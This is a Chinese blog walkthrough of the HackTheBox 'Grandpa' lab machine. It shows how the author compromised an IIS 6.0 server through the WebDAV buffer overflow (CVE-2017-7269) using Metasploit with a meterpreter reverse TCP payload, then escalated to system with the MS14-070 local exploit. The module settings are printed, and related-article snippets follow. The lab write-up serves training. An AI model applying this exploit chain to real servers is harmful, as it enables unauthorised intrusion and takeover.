Hackthebox::grandpa walkthrough

最新推荐文章于 2022-10-10 14:35:59 发布
最新推荐文章于 2022-10-10 14:35:59 发布
阅读量2k 收藏
点赞数
分类专栏: walkthrough 文章标签: windows 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missmxr/article/details/122182941
版权
  • Grandpa是hackthebox上一台难度为简单的windows靶机

信息收集

  • 首先使用nmap扫描一下端口情况

image-20211227230552901

  • 然后使用nmap扫描一下是否存在漏洞

image-20211227230757330

  • 通过两次nmap的扫描,我们得知靶机开放了80端口,并且存在漏洞
  • 使用searchsploit扫描Microsoft IIS httpd 6.0服务,看看是否有可以被利用的漏洞

image-20211227231051633

  • 我们发现了许多可以使用的脚本,再次使用msf查看是否可以利用‘

image-20211227231247078

  • 我们发现了可以利用的部分,我们使用第二个
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.129.166.10    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86
  • 我们成功进入了,但是很可惜我们的权限不足

image-20211227231707825

  • 我们将迁移进程,并且寻找合适的漏洞利用脚本来入侵
  • 迁移进程

image-20211227231911796

  • 使用suggester查看可以利用漏洞的脚本

image-20211227232427257

  • 我们发现了以下可以使用的方式,我们选择exploit/windows/local/ms14_070_tcpip_ioctl

image-20211227233022025

  • 完成设置

image-20211227233230168

  • 好的,我们成功了,获得了最高权限

image-20211227233425946

  • 查看flag

image-20211227233646152

维基人
关注
专栏目录
grandpa-bridge-gadget:最终爷爷的小工具
03-25
结实的(B脊ËfficiencyËnabling˚Finalityýielder)是沿GRANDPA终局运行的辅助协议,以支持高效的桥接与非底物blockchains,目前主要ETH mainnet。 可以将其视为GRANDPA Finality协议的(可选)特定于网桥的小...
hackthebox-grandpa(考点:iis6.0)不用MSF
冬萍子癸水
04-15 337
这靶机绝大部分人都是msf做的,毕竟适合这个靶机的漏洞文件没多少(还是中国人发现的呢),都是和msf相关,(而且用msf做也很不稳定,这靶机在论坛里也被吐槽),我好不容易找到个非msf的方法 nmap 从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像,没啥突破口,就是webdav信息多 故地重游 再来扫webdav 但是这次不一样了,都是fail 最后只能网上搜啊搜。。。搜到e...
IIS6.0(CVE-2017-7269) 缓冲器溢出
weixin_30377461的博客
09-09 475
漏洞描述开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号CVE-2017-7269 漏洞等级高危 影响产品Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建我的环境是windows 2003 R2 E...
iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1307
网上看到的iis6.0(cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
HackTheBox::Grandpa
aya3t的博客
10-10 167
HackTheBox::Grandpa
Hackthebox(1)系列持续更新
FryhRx的博客
04-14 4859
Hackthebox第一关 文章目录Hackthebox第一关前言一、Hackthebox配置openvpn?配置openvpn二、第0层(简单)终端弄好以后点击产卵机,然后会给你创建一个实例问题 1问题 2问题 3问题 4问题 5问题 6问题 7问题 82.拿flag总结 前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Hackthebox配置openvpn? Hackthebox是国外的一个靶场。 配置
finality-grandpa:使用通用前缀协议的区块链的finality小工具
05-15
finality-grandpa 爷爷,基于主机ģřecursive AN cestor d eriving P refix甲greement,为blockchains一个终局小工具,在锈病实现。 它允许一组节点就由某些外部块生产机制产生的规范链达成BFT协议。 它在部分同步...
FxxkOnmyoji:阴阳师给爷爬 | Onmyoji climbing for your grandpa
05-12
如何成为一名合格的阴阳带师本脚本仅供学习参考,不收取任何费用,如果你是付钱获取的,那么你可真的憨批。​ ——作者:李英俊小朋友[TOC]写在前面 | Write Head这是一个关于 阴阳师 的脚本,如果你不小心点进来了...
review-and-css-typesetting:关于
05-31
$ git clone -b v0.2.0 git@github.com:at-grandpa/review-and-css-typesetting.git 手册PDF 手册的PDF链接在下面(发行页面上的PDF链接)。它描述了如何设置以及如何继续编写。 此 PDF 还可用作示例 PDF。如果你...
huc:各种实用程序
03-19
HUC:各种实用程序使您的生活更轻松 HUC是一种易于使用的命令行工具,可用于执行各种任务,...huc email -h= " smtp.somerelay.org " -from= " someone@aol.com " -to= " grandma@aol.com " -s= " Grandpa Birthday
Grandpa国内开源引擎
06-18
"Grandpa国内开源引擎"是一款专为游戏编程初学者设计的开源游戏开发平台。这款引擎以其易用性和强大的功能,为新手提供了理想的起点,让他们能够快速地进入游戏开发的世界。在"Grandpa"这个亲切的名字背后,蕴含的是...
smoldot:基于基质的链的替代客户端
03-31
smoldot支持某些硬编码的共识算法列表,包括Babe,Aura和GrandPa。 只能通过修改smoldot的代码来添加对其他算法的支持,并且无法从外部插入自定义算法。 测试方法 存在两个客户端:完整客户端和wasm light节点。 ...
coding-for-grandpa:为爷爷写一些代码,抓取一些公开的评书、相声、戏剧资源
05-26
为爷爷写一些代码,抓取一些公开的评书、相声、戏剧资源。 目前抓取了单田芳、袁阔成、田连元、王玥波等表演艺术家的 1108 部作品。 爬虫运行了半小时,下载了 27G 左右的音频。 如何使用 # 安装依赖 ...
Bernie Sanders to Grandpa-crx插件
04-06
【标题】"Bernie Sanders to Grandpa-crx插件"是一个专门为英语用户设计的浏览器扩展程序,其主要功能是将网页上出现的“Bernie Sanders”这个名称替换为“Grandpa”。这款插件以轻松幽默的方式,将美国政治人物伯尼...
substrate-stencil:用于启动基于Substrate的PoS链的模板
05-26
共识相关托盘:Babe&GRANDPA 放样相关的托盘:放样,会议,作者,在线,犯罪,实用程序 与治理相关的要素:集体,成员,选举议员,民主,珍惜 注意:该代码未经审核且尚未投入生产,使用该代码需您自担风险。 :...
Metasploit复现 IIS6.0远程溢出漏洞
土豆回锅的博客
01-24 3996
漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 20
Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)
ai749499的博客
01-07 339
ExplodingCanhttps://github.com/danigargu/explodingcan An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA. Details Vulnerability: Microsoft...
Microsoft IIS WebDAV安全漏洞修复参考
煜铭2011
04-27 3396
0x01 漏洞简介 Windows Server是微软发布的一系列服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)
mirror97black的博客
01-24 4336
漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出 漏洞等
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值